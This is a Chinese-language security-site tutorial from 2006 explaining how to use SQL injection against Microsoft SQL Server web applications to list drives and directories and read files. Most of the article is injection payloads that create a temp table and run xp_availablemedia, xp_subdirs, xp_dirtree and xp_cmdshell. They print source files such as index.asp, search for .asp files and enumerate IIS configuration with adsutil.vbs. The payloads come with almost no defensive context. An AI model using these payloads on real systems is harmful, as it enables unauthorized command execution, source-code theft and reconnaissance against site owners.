您没有来错地!为了更好的发展,黑基网已于9月19日正式更名为【安基网】,域名更换为www.safebase.cn,请卸载旧的APP并安装新的APP,给您带来不便,敬请理解!谢谢

黑基Web安全攻防班
安基网 首页 IT技术 电脑技术 查看内容

如何利用Sql 注入遍历目录

2006-3-6 00:28| 投稿: computer

摘要: 有时候手工注入时就用得到了 关于如何取得注入入口不再说了,前面的帖子都说得很详细了,我们就如何浏览全部目录和文件进行研究当System_user为"sa"时,具有全部权限,包括执行master.db...
有时候手工注入时就用得到了 关于如何取得注入入口不再说了,前面的帖子都说得很详细了,我们就如何浏览全部目录和文件进行研究当System_user为"sa"时,具有全部权限,包括执行master.dbo.xp_cmdshell,如果这个存储过程没有改名或删除,我们可以利用它来遍历全部目录,执行如下:先创建一个临时表:temp'5;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));--接下来:(1)我们可以利用xp_availablemedia来获得当前所有驱动器,并存入temp表中:5';insert temp exec master.dbo.xp_availablemedia;--我们可以通过查询temp的内容来获得驱动器列表及相关信息(2)我们可以利用xp_subdirs获得子目录列表,并存入temp表中:5';insert into temp(id) exec master.dbo.xp_subdirs 'c:\';--(3)我们还可以利用xp_dirtree获得所有子目录的目录树结构,并寸入temp表中:5';insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:\';--这样就可以成功的浏览到所有的目录(文件夹)列表:如果我们需要查看某个文件的内容,可以通过执行xp_cmdsell:5';insert into temp(id) exec master.dbo.xp_cmdshell 'type c:\web\index.asp';--浏览temp就可以看到index.asp文件的内容了!当然,如果xp_cmshell能够执行,我们可以用它来完成:5';insert into temp(id) exec master.dbo.xp_cmdshell 'dir c:\';--5';insert into temp(id) exec master.dbo.xp_cmdshell 'dir c:\ *.asp /s/a';--通过xp_cmdshell我们可以看到所有想看到的,包括W3svc5';insert into temp(id) exec master.dbo.xp_cmdshell 'cscript C:\Inetpub\AdminScripts\adsutil.vbs enum w3svc'但是,如果不是Admin的权限,我们还可以使用5';insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:\';--

小编推荐:欲学习电脑技术、系统维护、网络管理、编程开发和安全攻防等高端IT技术,请 点击这里 注册黑基账号,公开课频道价值万元IT培训教程免费学,让您少走弯路、事半功倍,好工作升职加薪!



免责声明:本文由投稿者转载自互联网,版权归原作者所有,文中所述不代表本站观点,若有侵权或转载等不当之处请联系我们处理,让我们一起为维护良好的互联网秩序而努力!联系方式见网站首页右下角。


鲜花

握手

雷人

路过

鸡蛋

相关阅读

最新评论

最新

返回顶部